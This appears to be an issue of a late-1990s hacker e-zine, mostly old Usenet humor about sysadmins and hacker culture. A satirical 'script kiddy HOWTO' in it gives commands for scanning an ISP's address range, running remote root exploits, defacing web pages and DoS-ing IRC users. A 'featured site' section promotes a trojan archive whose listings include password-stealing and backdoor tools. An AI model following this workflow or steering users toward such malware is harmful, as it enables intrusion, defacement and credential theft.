http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 Canc0n99 Canc0n99 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$ ! ! $ $ ! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** ! $ $ ! ! $$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$ www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Sysadmin Interview Qs Path: athena.cs.uga.edu!emory!wupost!uunet!uunet.ca!xenitec!looking!funny-request From: zoo@cygnus.com (david d `zoo' zuhn) Newsgroups: rec.humor.funny Subject: Job Interview pointers.... Keywords: original, chuckle Message-ID: [S45c.6b76@looking.on.ca] Date: 5 Sep 92 23:30:03 GMT Organization: Cygnus Support -- +1 415 322 3811 Lines: 44 Approved: funny@clarinet.com I was on the interviewer side of a job interview for the first time a few days ago, and in preparation I asked many people for help and advice. I received a set of sample questions from a best friend in a previous life. All credit or blame for the following truly belong to Brian R. Smith (brsmith@cs.umn.edu), and is reproduced here by permission: "How do you work in a team situation when all the other team members are fools and idiots?" "How well do you program under the influence of hard drugs?" "Have you ever beaten or killed a co-worker?" "Give me a rough estimate of the maximum dollar amount that you've stolen from each of your previous employers." "Do you object to bullwhips in the workplace?" "Emacs or vi?" "You have a large network of Suns being used by secretaries for word processing in FrameMaker. Which GNU packages would you install for your own entertainment, and how would you justify them later?" "You see a wounded puppy bleeding and whimpering on the side of the road while you're running to work to fix a downed computer that tens of users are waiting for. Do you let the puppy die?" "Why not?" "How much of your workday would you waste by reading news?" "Recite the GNU Manifesto." "How many clients (30% diskless, 60% dataless, 10% /var/spool/mail only) can a Sun 600MP server serve simultaneously, and what relation does this have to angels and pinheads?" -- -=- Hacker Syndrome Paper The Hacker Syndrome By Tad Deriso There is some compelling force in all Hackers that seems to draw them to their computers every day. Why they get up at 4am to use the modem, and why they continue to rack up a truly incredible phone bill is beyond me. Most computer areas, at your home or at your office, tend to be messy. Even you try to keep it clean, it is truly impossible. Whether it be empty Coke cans laying all around, soldering devices, electric diodes, computer parts, or integrated circuits, it is not only a pain for your mother to look at, but a prime Russian ICBM missile target as well. There is much detail needed to explain a Hacker. For instance, instead of organizing his clothes by color, best ones, or style, he organizes his by pile. Also, he likes to sing songs such as, "Let's get Digital", "We all live in a yellow subroutine", and "Somewhere over the RAMbow". Most Hackers do well in school. The reason is not to impress their teachers, not to get money from their parents, and not to be educated, but they do it so they can hopefully get a scholarship to MIT. You can't blame them, though, if they are looking out into space. It might be because they are worried if MCI traced the calls that they sent to NORAD. All Hackers, big or small, love computers, whether they be Trash-80's or an IBM 360/VM workstation. When they get on one, it's mighty hard to get them off of it. There are 2 types of Hackers. One who likes to crash local BBS's, and the one who writes programs in Assembly Language. The Hacker who crashes systems is the one that most people think that a Hacker is. A typical example of one is John Fredrickson (A.K.A. "The Phone Man"). He loves to crash computers, and break into illegal systems. The ones that he has gotten in to are MCI, CitiBank, school systems, IBM, Southern Bell, and Georgia Tech, not to mention all the ones in between. The second type of Hacker is the programmer. He writes games, utilities, and anything else that he can think of. Take for example, John Harris, a freelance software writer for On-Line Software Co. John had a brainstorm one day, and decided to write Frogger for the Apple. He thought that it would take about 3 weeks to complete. He started on Frogger a week late, because of the complicated music set that he had to write. After two months, he was almost done. He decided to take a break and go to the Software Expo. He decided to take his nearly completed Frogger, and show it to the consumers at the show. He also took with him the only back-up copy, in case the main disk did not boot. While at the fair, he was talking to the Manager about getting a booth. He had his disks with him. Then, when he got a booth reserved, he reached down to get his disks, and they were gone! All his hard work, including the MultiLevel character generator, music lines, disk subroutines, assembly routines, debugging programs, etc. All gone. After that tragedy, John was in a deep depression. He finally started working on it again in 3 months. He completed it in 4 months and 3 days. Part Two: Hackers always take time off. There is always one way to notice a true Hacker. At a party, the true Hacker is the one in the corner talking about operating system security and how to get around it. At the beach, the True Hacker is the one drawing flow charts in the sand. At a football game, the true Hacker is the one comparing the football plays against a simulation printed on 11 by 14 fanfold paper. Most Hackers work for the U.S. Government-- mainly the Department of Defense. You can see the best Hackers at the Jet Propulsion Laboratory in California. What sort of environment does a Hacker function best in? No, not a heated room with a clean table and disks organized neatly, but they do best in rooms that have line-printed Snoopy calendars from the year 1969. They do not know how to cook, so they survive on Twinkies and coffee. Instead of wasting electricity for a heater, they spend it on air-conditioners to cool of their computer system in mid-January when the temperatures are below freezing. They wear layers and layers of clothing to keep the body heat in. When you see one of these people, instead of a Hacker coming into your mind, you think that he is about to go on a Polar expedition somewhere in the North Pole. Hackers also like to hang around arcades. (This is also true for kids, little old ladies, and fighter pilots.) There, secluded in their own environment, Hackers can talk freely on computer hints and short cuts while playing Pac-Man, or Joust. All Hackers like Graphics. They like low-resolution, but prefer high- resolution the best. These graphics, such as Sine waves, rotating 3-D boxes, and little balloons, are confined to the limits of a systems capability. The older more experienced Hackers are the ones who are lucky enough to get to work on a VAX system, and maybe even a CRAY-1 SuperComputer. If they use these, they have only the limits of their imagination to stop them. Most Middle School Hackers between the ages of 10 through 14, like to use computers to do reports on, and play games. Some of these younger generation Hackers have gotten into BASIC programming. Some people, like to impress real Hackers by making them think that they know everything. There is a certain name for this kind of person. He is a Sub-Hacker (Intillectuous dumbfoundeth). For instance, you come up to them one day, and say,"Hey so-and-so what does BASIC stand for?" and you could sit there for days, and he would act like the answer was on the tip of his tongue, when it was probably in his toes. It is people like this that give Hackers a bad name. Part Three: All Hackers have certain rules that they go by. One is to never call long distance on Monday, because of the high phone charge. Another is If builders built buildings they way programmers wrote programs, the first woodpecker that comes along would destroy civilization. Another is, if the computer accepts a program on the first run without any errors, either there is a malfunction, or it must be a dream. Hackers are a unique breed. Combining intelligence, personality, and a morale sense of good taste. A Hacker enjoys the environment that appeals to him the most. Such as, the computer room, the arcade, science lab, or the Atari downstairs. They like to be alone. Secluded in their own thoughts, thinking of what the password could be to log on to General Electric. Hackers are the people who are going to make our future brighter, and more exciting in the field of electronics, data processing, artificial intelligence, and programming. We need to support these people in all the ways that we can, so we will be insured of a more happier future in the world of technological advancements. -=- Awesome Unix Chdir Program Path: athena.cs.uga.edu!emory!swrinde!zaphod.mps.ohio-state.edu!uunet.ca!xenitec!looking!funny-request From: baur@mdcbbs.com (Steve Baur) Newsgroups: rec.humor.funny Subject: NEED HELP FAST !!!!!!!!! Keywords: original, computer, smirk Message-ID: [S425.63b1@looking.on.ca] Date: 12 Jul 92 23:30:04 GMT Lines: 58 Approved: funny@clarinet.com This composition is original, although the subject is not. --------------------------- Cut Here--------------------------------- Newsgroups: comp.unix.questions Subject: NEED HELP FAST !!!!!!!!! From: cs245@cs.somewhere.edu (The Unknown Hacker) Date: 7 Apr 92 12:55:45 EDT Organization: UNIX Guru's R Us! HI, EVERYBODY!!!! Sorry if this is a FAQ, but I've heard that a FAQ is something everybody already knows, but since I don't know the answer to this everybody doesn't know it, so it can't be a FAQ, so here I go ... I've just created about the most Awesome change directory program ever written. If it doesn't find the target directory through an exhaustive CDPATH search, it uses the most sophisticated spelling corrector (based on a thorough analysis of Webster's on-line dictionary, and a list of the 1000 most common directory names on Unix systems throughout the world) to try to find a match that way. If that fails, then it tries to create the directory, and if that fails, it opens /dev/uri-geller, and reads the mind of the invoker to try to figure out what to do. It executes with almost 0 impact on system resources, and is most truly the finest/tightest code ever to grace the memory of a computer. The only problem is that it doesn't work. No matter how I've tried, once I've done that last chdir (and I've tried doing several identical chdir(2)'s in a row to see if that would make the directory change more "sticky" but that didn't work) I always end up where I started in the shell I started my program in. I've tried setting the PWD, and CWD variables with putenv(3), but that doesn't seem to have any effect. What it really seems to me, is I need some way of telling the shell what directory it's supposed to be in when my program is done executing. Put more simply, I need a way of modifying the environment of a parent process. E-mail responses only. There's too much noise on this bboard for me to be able to read it. And HURRY!!! I need to turn this project in by 5pm tonight !!!! +----------------------------------------------------------------------------+ | _ /| | | \'o.O' UNIX Guru in training | | =(___)= | | U Joe Programmer | | ACK.. THPPT!!!! cs245@cs.somewhere.edu | | | +----------------------------------------------------------------------------+ -- - Steve Baur@mdcbbs.com (236/607 4/1/92) -- System Administration Support Fees Support Fees: Calling me with a question - $10 Calling me with a stupid question - $20 Calling me with a stupid question you can't quite articulate - $30 Implying I'm incompetent because I can't interpret your inarticulate problem description - $1000 + punitive damages Questions received via phone without first trying help desk - $10.00 Questions where answer is in TFM - $100.00 Calling me back with the same problem *after* I fix it once - $100 Insisting that you're not breaking the software, the problem is on my end somehow - $200 Asking me to walk over to your building to fix the problem - $5/step Asking me to drive to another town to fix your problem - $50/mile + gas If you interrupt me while I was trying to actually fix somebody else's problem - $45/hr If you try to hang around and get me to fix it now - $50/hr If you expect me to tell you how I fixed it - $60/hr If you've come to ask me why something isn't working that I'm currently working on - $70/hr If you're asking me to fix something I fixed for you yesterday - $75/hr If you're asking me to fix something I told you I fixed yesterday, but never did fix - $85/hr If you're asking me to fix a quick patch that I made that didn't work - $95/hr If you're bugging me while there's another admin in the room who could have done it for you - $150/hr Making me trek to your office to fix your problem then leaving immediately after hanging up the phone - $1500.00 Calling up with a problem which "everybody" in the office is having and which is "stopping all work." Not being there when I rush over to look at it and nobody else in the office knows anything about it. - $1700.00 Explaining a problem for 1/2 hour over the phone BEFORE mentioning it's your personal machine at home - $500.00 Self-diagnosing your problem and informing me what to do - $150.00 Having me bail you out when you perform your own repairs I told you not to do - $300.00 Not telling all of your co-workers about it - $850.00 Figuring out you mean floppy drive when you say hard drive - $50.00 BEFORE I order your replacement hard drive - $250.00 Fixing your "broken" mouse with a mousepad - $25.00 Fixing your "broken" optical mouse by rotating the mousepad 90 degrees - $35.00 Fixing a "broken" mouse by cleaning the rollers - $50.00 Fixing your "broken" printer with an ink/toner cartridge - $35.00 Fixing your "broken" ANYTHING with the power button - $250.00 Fixing the "crashed" system by turning the external disk back on - $200.00 Fixing the "hung" system by plugging the ethernet transciver back in - $375.00 Fixing the crashed nameserver by plugging back in the SCSI cord someone accidentially yanked out on Friday afternoon when the 'real' sysadmin has just left for a two week vacation - $400 Visiting your old university and fixing the broken PC by plugging the monitor lead back in - $50 Explaining that you can't log in to some server because you don't have an account there - $10 Explaining that you don't have an account on the machine you used to have an account on because you used it to try to break into the above server - $500 Forgetting your password after it was tattooed on your index finger - $25 Changing memory partitions without informing me first - $50 Installing programs without informing me /getting permission first - $100 per program Technical support for the above programs - $150 per hour (regardless of whether I know the program or not :)) Spilling coke on keyboard - $25 plus cost of keyboard Spilling coke on monitor - $50 plus cost of monitor Spilling coke on CPU - $200 plus cost of motherboard swap plus hourly rate of $150 per hour spent reinstalling the system Leaving files on desktop - $5 per file, $10 per day the file is left unclaimed Cleaning the mouse with spit and sleeve - $50 plus cost of sleeve plus cost of therapy :) Bringing in your own copy of the original Norton Utilities v1.0 to fix a brand new machine - $200 Chewing on the end of the graphic tablet stylus - $25 Putting feet up next to workstation after ten mile jog through NYC streets - $50 Spending 30 minutes trying to figureout what your problem is, and another 5 explaining how to verify and fix it, only to hear you say... "So that's what the little box that popped up on my screen was telling me to do!" - $40 Listening to your network troubles, suggesting that you check to see if you are plugged into the network jack, hearing yes, trying five other things, asking you to identify your plug type, listening to you drag furniture, and hearing a sheepish, "Oops. Nevermind." - $35 (including discount for polite apology) Dealing with tech support requests for obviously pirated software - $25 Dealing with "How can I get another copy of [obviously pirated software]? Mine just died." requests - $45 Having to use the "We're really not the best people to talk to about that; why don't you try calling the number on the box in which you bought it?" line - $55 Actually needing to explain copyright law to you after you failed to get the hint in the previous response - $95 (includes instructions for getting freeware replacements from the public file server) Having to point out anything that's on the wall in a typeface larger than 18 points - $15 If I wrote the sign - $45 If it's in a 144 point font and taped to the side of the monitor facing the door - $75 Reporting slow connection by passenger pigeon packets to MPEG archive in Outer Slobavia as a Mosaic/Netscape/Gopher/FTP client problem - $25.00 Reporting it more than once - $50.00 Reporting it more than once and implying slothfullness on tech support's inability to solve problem - $200.00 Beeper Prices: Beeping me when I'm out with the significant other - $50 Beeping me when I'm out of town and I took pains to insure that help files were left all over and that diagnostics had been run on all machines before I left - $100 Beeping me more than once to tell me that the printer's offline and the fix is to press the On Line button - $200 Beeping me more than once while I'm asleep - $50 per beep Beeping me and not identifying yourself within the first 5 seconds - $25 Beeping me and then changing your story / denying you placed the call / hoped I would forget who caused the problem - $500 Special Rates: Dealing with user body odor - $75.00/hour Dealing with user not familiar with the primary language spoken at site - $50.00/hour Dealing with user who is (self-proclaimed) smarter than you are, but still calls every other day for help - $100.00/hour Dealing with computer hobbiests - $125.00/hour Questioning the other prices .................................$50 -=- . A Day in the Life of a SysAdmin by Thomas Farrell, tfarrell@lynx.dac.neu.edu The life of a sysadmin goes approximately as follows. 8am: Your pager goes off and wakes you up. The message says it's the office, and it's a crisis. You roll out of bed moaning. 8:15am: You are now sufficiently awake to phone the office. Your pager has gone off three times already. You get through to the office and the receptionist is frantic. She says nobody in the entire office can print and they have a major proposal that has to be faxed out before 9am and if it isn't the company could lose a million dollars in new business. You try to get her to explain what's wrong, but she's incoherent. 8:30am: You're dressed in yesterday's dirty clothes (they were all you could find in time) and running out the door, sipping a Jolt cola and hailing a cab to the office. 8:45am: You arrive at the office. 8:46am: You determine that the problem is that the printer is turned off, and you turn it back on. 10,000 pages spew out from the hundreds of multiple failed attempts by all of your coworkers to print. 8:47am: Your boss reams you out for "not having fixed that printer problem last time when you said it was all taken care of. You spend the next hour explaining that there's nothing you can do to stop people from turning off the printer if they really want to. You don't bother to mention that you happen to know that the person who did it is your boss's spouse. 9:45ish: You finally convince your boss to release you and make your way to your office, assaulted all along the way by people demanding that you must help them fix things right now that you know are going to take weeks and really aren't priority. 10am: You finally arrive at your office and shut and lock the door to keep out the users. You start to read the 40 or so email messages you find waiting every morning, which include about 5 new requests, 34 or so messages demanding to know why such and such hasn't gotten done yet, and one message from your boss denying your request to have an assistant and demanding that you justify how you spend your time yet again. 10:30am: You realize that you're never going to finish getting through your email if you keep getting interrupted by these damned telephone calls from the same people who sent you the email asking the same questions, so you put your phone on do-not-disturb and go back to your email. 11am: You've just finished responding to all of your email, including the umpteen millionth justification of your existance for your boss. Unfortunately, the secretary has figured out how to order the phone system to override your do-not-disturb on your phone, and is now routing all the angry phone calls from your coworkers to you. 11:30am: You finish talking to everyone on the phone and calming them down. 11:30am-4:30pm: You work your ass off on whatever projects have the most urgency to the company. Usually this involves a lot of work with software, crawling around on the floor several times, tearing a hole in your clothing, and banging your head (hard) on the bottom of a desk. 3pm: You have your lunch delivered to your office. 4:30pm: You finally get to touch your lunch, and realize that Burger King french fries do not taste good cold. You're on about your 15th coke since arriving in the office. 4:35pm: Your lunch is over. You're not finished eating, but your boss has just phoned you (he knows how to override the DND on the phone too) and demanded that you drop everything and go fix some assinine problem which you know is caused by the user and which you fix every week and which you have warned the user about but about which they just don't listen. 6:30pm: You finish the project your boss set you to and decide to try to sneak out of the office and go home. (Not that you have a social life or anything, but you haven't had 8 hours sleep in a month and a half.) In the elevator on the way out of the office you encounter a coworker, who grabs you by the ear and drags you back to the office to fix something that's bugging them. 6:30pm-8pm: Somehow, despite repeated attempts to leave, the moemnt you try to actually do so, someone else appears to force you to work. 8pm: You're about to depart when you're suddenly informed that there's some vitally urgent data processing that has to be done and that only you know how to do and which can't be performed until all of the data entry people have left for the night at 10pm. 8pm-10pm: You try to nap in your office but the phone keeps ringing so you finally give up and put in several more hours of working. 10pm: You try to do your data processing but can't because there are still people logged into the data acquisition system. You spend the next fifteen minutes running around begging them to log out, and they reply that "yeah, I'll be out in a minute..." 10:20pm: You get sick of waiting, walk over to the server console, issue commands to kick off all the users, and disable logins. 10:30pm-2:30am: You perform that data processing which nobody else could do because they won't let you teach them because they know what kind of hours you have to put in doing it. Midnight: Your blood turns to coca-cola. 2:30am: You realize that the data processing isn't QUITE done but you're about to pass out so you re-enable logins so you won't get paged about THAT in the morning, scrounge a taxi voucher out of your desk (they've given you your own pad because you use them so often), call a taxi, and leave the building. 2:45am-3:15am: You freeze your ass off waiting for a taxi. 3:15am-3:30am: The taxi takes you home. The driver seems to have decided to take the scenic route for the hell of it. 3:31am: You collapse in a heap on your bed and fall asleep face down with your shoes on the pillows and your clothes still on because you're too tired to remove your clothes or even orient yourself properly on the bed. 8:00am: Your pager goes off. Repeat ad nauseum until your boss doesn't like your response to one of his "justify your existance" demands and fires you or you die of caffine poisioning. Oh, and don't bother factoring in any weekends or holidays: You'll be expected to work those too. Now do you have some slight understanding of why I don't like being a sysadmin? I really lived like this for about a year. I'm amazed I survived it. -=- As true then as it is now, from 1992. Network Admin Job Descr From UGANET@uga.cc.uga.edu Tue Apr 28 09:17:17 1992 Return-Path: [UGANET@uga.cc.uga.edu] Received: from uga.cc.uga.edu by marie.stat.uga.edu (4.1/SMI-4.1) id AA17223; Tue, 28 Apr 92 09:17:17 EDT Message-Id: [9204281317.AA17223@marie.stat.uga.edu] Received: from UGA.CC.UGA.EDU by uga.cc.uga.edu (IBM VM SMTP R1.2.2MX) with BSMTP id 4057; Tue, 28 Apr 92 09:15:46 EDT Received: from UGA.BITNET by UGA.CC.UGA.EDU (Mailer R2.07) with BSMTP id 8820; Tue, 28 Apr 92 09:15:44 EDT Date: Tue, 28 Apr 1992 09:13:01 EDT Reply-To: "David Matthews-Morgan" [DMM@uga.cc.uga.edu] Sender: Technical Discussion for UGA Networking [UGANET@uga.cc.uga.edu] From: "David Matthews-Morgan" [DMM@uga.cc.uga.edu] Subject: A Network Posting for Your Amusement To: Multiple recipients of list UGANET [UGANET@UGA.BITNET] Status: OR This posting seems to fit what many of us are experiencing as network managers. Does this strike a chord with anyone here? 2 DM ---------------------------- Original Message ------------------------------ From: deljones%THAMA1.APGEA.ARMY.MIL@uga.cc.uga.edu Subject: Re: Network Administrator Job Description X-To: Novell@suvm.acs.syr.edu To: Multiple recipients of list NOVELL [NOVELL@SUVM.BITNET] ]Our department is considering budgeting a full-time position for a network ]administrator. Likely functions are network support, applications support, ]and liaison with computing center. ]Does anyone have a job description and salary info that might help us budget ]such a position? I am currently on about 35 pages of a job description. It looks like 50 to 75 tight pages before completion. Basically, the description is to know everything about computers, business, training, programming and hardware support and do everything, including forecast 5-15 years into the future. Should have at least completed grade school equivalency. Have 10 years or more network experience with 20+ years of computer experience. Needs CNE certification. Be willing to work 24 hours a day, 7 days a week. Must be willing to work for starvation wages and feel privileged to be able to work with all of the equipment. Must be trustworthy, honest, kind and above all thrifty. Must understand overtime is a luxury "we can not afford." Should be able to write 30 pages of documentation for every 10 minutes of installation work (spending no more than 10 minutes doing this documentation). Requires an even temperament, realizing that the LAN Manager is a servant to all, master of none. Should be able to learn any software package in 10 minutes, so as to perform a one day training seminar scheduled for NOW. Must be willing to work in a converted closet with no windows or ventilation. Must be willing to wear a beeper to the bathroom. Must commit to giving a minimum of one year's notice before leaving. There are more requirements, but that gives the general gist. Oh and by the way because of enlightened management, the salary should be at least 10% over minimal beginning secretarial wages. -Del Recently uploaded to PacketStorm; Berkeley California - http://www.pressanykey.com/humor/berkeleysong.html Sung to the tune "Hotel California" by the Eagles In a dark dim machine room Cool A/C in my hair Warm smell of silicon Rising up through the air Up ahead in the distance I saw a Solarian(tm) light My kernel grew heavy, and my disk grew slim I had to halt(8) for the night The backup spun in the tape drive I heard a terminal bell And I was thinking to myself This could be BSD or USL Then they started a lawsuit And they showed me the way There were salesmen down the corridor I thought I heard them say Welcome to Berkeley California Such a lovely place Such a lovely place (backgrounded) Such a lovely trace(1) Plenty of jobs at Berkeley California Any time of year Any time of year (backgrounded) You can find one here You can find one here Their code was definately twisted But they've got the stock market trends They've got a lot of pretty, pretty lawyers That they call friends How they dance in the courtroom See BSDI sweat Some sue to remember Some sue to forget So I called up Kernighan Please bring me ctime(3) He said We haven't had that tm_year since 1969 And still those functions are calling from far away Wake up Jobs in the middle of the night Just to hear them say Welcome to Berkeley California Such a lovely Place Such a lovely Place (backgrounded) Such a lovely trace(1) They're livin' it up suing Berkeley California What a nice surprise What a nice surprise (backgrounded) Bring your alibies Windows NT a dreaming Pink OS on ice And they said We are all just prisoners here Of a marketing device And in the judges's chambers They gathered for the feast They diff(1)'d the source code listings But they can't kill -9 the beast Last thing I remember I was restore(8)'ing | more(1) I had to find the soft link back to the path I was before sleep(3) said the pagedaemon We are programmed to recv(2) You can swap out any time you like But you can never leave(1) [ substitute whirring of disk and tape drives for guitar solo ] Written by David Barr and Ken Hornstein and a little help from Greg Nagy http://www.genocide2600.com/~tattooman/unix-humor/script-kiddy-HOWTO After you're done reading the access denied msg when you try going up dirs manually heres the 'side door' : http://www.genocide2600.com/~tattooman/new.shtml ;-) How-to Be a sKr1pt k1ddi3 by DrHamstuh ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* This , Like the world is only what you perceive it to be */ Q:"How Do I Become A Hacker?" A: learn to code , install SunOS , get a SPARC , devote the rest of your life to computers and technology Q: well fuck that I'm lazy , how do i become a script kiddy? A: hmm I guess i can show you , whatever you do with this Info is your fault not mine... First things first , I am taking it you have Linux installed and a conection to the net. If you are still on Windows* [TM] (C) (R) then please look into getting a linux CD-ROM from www.cheapbytes.com install linux , setup PPP [if in redhat just startx and use netcfg pussy] and come back and read this again ... thanx -=-=-=-=- t0p s3kr3t 0nly l1nux k1ddyZ c4n r3ad bel0w th1z l1n3 -=-=-=-=- /* top secret hamstuh encryption */ JLKADJFLK;ASDFJLKSA;DJFLASK;DFJSLAKFJLAKSDFJLASKFJDLSKDJF * tools * mountd remote exploit code named remote expliot code imap remote exploit codes wu-ftpd remote exploit code Security Scanner. SSCAN by JSBACH listen remote exploit code q-pop remote exploit code ICQ bomber & flooder source code Denial Of Service code BitchX BitchX War Scripts * tools EOF * * general idea * Cause as much trouble with the tools you have as posible figure out what each tool does and how / why it works overall have fun with people and concider yourself better than them because you can use teardrop.c to freeze their windows computer or ADMmountd.c to break into their elite red hat 5.1 box * getting started * to get started first you have to be a able to walk , being able to walk is relative to this as being able to move around your operating system. if you are "hacking" from a linux box [ YAY ] then these commands will help you. mkdir = creates a dir mv = move , rename cp = copy rm = remove id = shows you who you are w = shows you who's logged in tail -f = lets you watch a file as text is added to it in real time echo = add's text to a file cd = changes your directory those are some of the basic's now you should be able to get started. =============================================================================== HOT TIP: make a dir in your base directory called .anythingsecret the . makes it not able to be shown to a regular ls , kind of hides it. HOT TIP: put all your "hacking" files in that .anythingsecret DIR keep everything clean and in order and it will be a ton easier to keep your thoughts 2gether and in the long run you may have more "r00t shellz" ----------------------------------------------------------------------------- "r00t shellz" : in my earlier days i was told by someone who had been on the scene for a long time , longer than i had that "root shells" are pretty much what you judge your eliteness on. ------------------------------------------------------------------------------ There are NO rules to being a script kiddy , and NO morlas are enforced upon you , your actions are your actions , and what you see fit to do will always be looked at by others and judged. ------------------------------------------------------------------------------ I want to.. A] hack shit now. B] get on IRC and learn more before i continue my life as a script kiddy C] change my mind and go get a sparc and be a real haxor if you said A then you have the mentality it takes to be a true script kiddy and im not going to hold you back any longer .. lets get started on talking about how to break into those krad red hat systems... If you just want to hack ANY computer on any network then i suggest just letting your Security Scanner scan for a long time and then picking the computers out of your scanners log file that look like you would be able to gain access to the easiest. [ mountd / named / imap ] If you are using SSCAN (tm) JSBACH, and are ready to hack some shit NOW. then start SSCAN running on some small town ISP.. ie: home@linux# ./sscan localisp.com/24 >> hot.list & once the scanning has completed then use your favorite word editor [PICO@#%] and read the file.. look for where SSCAN has told you that a server is mountd/imap/or named overflowable.. and then just try all the servers listed with the exploit that it is listed for... surely after a while one will work.. even the sun shines on a cluebie script kiddy's ass some day. [ gcc -o rotshb rotshb.c ] ./rotshb server.com 4 1 [ gcc -o mountd ADMmountd.c ] ./mountd server.com [ gcc -o imapk1ller imapexploit.c ] ./imapk1ller host.com offset you will now when your exploit worked and when you have root , and you will probally get a funny little feeling , kind of an exited feeling that will be your motovation to do this again.. now once you have root you are ready for the beef of a script kiddys life.... changing HTML.. a script kiddy changes HTML in many ways for many reasons.. the funnier hacks i have seen are hacks that are supose to be serious in which script kiddys voice their opinions on varios things .. from the soup at school not tasting good to the government just any opinion that they have in thier little brains .. [ find / -name index.html ] root@hackedbox# echo " i own you " >> /home/httpd/html/index.html now that you have defaced your first web page , get on IRC and brag about it , as a script kiddy its something that you HAVE to do.. load up BitchX and your War Script [ Civic.bx ] and head on over to TeenChat on EFNET.. scroll the URL to the page you just "hacked" and if anyone says anything negative to you say " Shut Up Bitch I Own You " and nuke them with /teardrop or any other elite d.o.s alias your war script may have.. you are now on your way to being a super ereet script kiddy.. by now you have probally allready caused a stir in the underground and JP from AntiOnline.com is going to interview you because you hacked the first jewish server that was ever ran off linux .. and now the pope thinks you are the anti-christ and has been talking about you as an evil haxer all week on the news.. JP see's a chance to exploit you and make money off your teen ignorance and does so in a gracefull manor. now your ego is larger then your IQ , you know how to root a server , you know how to D.o.S anyone on IRC , you are confident , you are clueless , you think you are a god , you have younger want to be script kiddys worshiping you , you are in the pinacle of your script kiddy life , now take your ICQ flooders / bombers and herass everyone on your ICQ list for no obvious reason.. you are now a Script Kiddy .. enjoy your new life of stupidity... in about a year you will realize that being a script kiddy is nothing but a waste of time.. and sure you have learnt your way around linux like a small town with only once street to pick up hookers , but you still have a long way to go before you are corprate material.. and once you decide computers are your dream and thats what you want to do for the rest of your life you notice that you wasted the last year and a half being a script kiddy .. inflating your teen ego .. hurting lil web servers for no reason other than the thrill of the hack.. heh ---- another uselss rant by DrHamstuh @HWA HOW.TO How to hack part 3 ~~~~~~~~~~~~~~~~~~ To be continued (probably) in a future issue... if time permits and inclination is prevelant. ie: if & when I feel like it.. :p (discontinued until further notice) Meanwhile read this: http://www.nmrc.org/faqs/hackfaq/hackfaq.html Link And especially, this: http://www.tuxedo.org/~esr/faqs/hacker-howto.html Link (published in its entirety in issue #12) @HWA SITE.1 Featured site: http://www.hackworld.freeserve.co.uk/look/trojanx.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This site constantly has some of the newest and hardest to find trojans around... check it out,. no banner click games here. http://www.hackworld.freeserve.co.uk/look/trojanx.htm TrojanX A shot from their front page: Welcome to our trojan archive. We have some very rare and very new trojans here including the rare Netbus 1.20 and the very good new Netbus 2.0. Enjoy! Feel free to E-mail me with any comments our ideas. You might even get an answer. Name Description Subseven 1.1 An updated version with many new features including an offline keylogger Subseven Brand spanking new trojan for you guys. Its a netbus/bo clone with a good interface. Released 28/2/99! NetRex Same as Netbus 2.0 execpt it dosen't have the installation files. Netbus 2.0 Its out! The netbus 2.0 beta. This version has a new interface and alot more functions. Download it now Netbus1.20 A very old and rare version of the popular trojan. BOclient 1.4 Brand new client for BO with multiple ip feed , built in send and recieve TCP and alot more Wincrash Very new trojan with some neat functions, like disabling ctrl + alt + del. Executer Very new trojan with some neat functions, destructive functions Backend Back orifice with a supposedly more user friendly interface Girlfriend A good scarce trojan used mainly to for getting passwords of other computers. Fatal network error Outputs a message box to the screen saying that a fatal network error has occoured and prompts for username and password. Writes this info to c:\os32779.sys in plain text Millenium Hot of the shelves, new trojan, has some good functions, May possibily contain a virus! Netbus 1.60 version 1.6 of the very good and simple to use trojan. Recomended Netbus 1.70 Version 1.7 of the very good and simple to use trojan. Recomended Whackjob A game containing the netbus trojan, when the user plays it the trojan is installed Back orifice Probably the best known trojan, a bit more difficult than netbus Gatecrasher A little known trojan, simialar to netbus but not as good Deepthroat Another little known trojan, quite easy to use not that complicated. Masters paradise 8 In french, Would be the best except causes lots of errors H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Several sites were cracked in support of hacker/cracker Jason Mewhiney who recently 'defaced' a nasa website. The page's 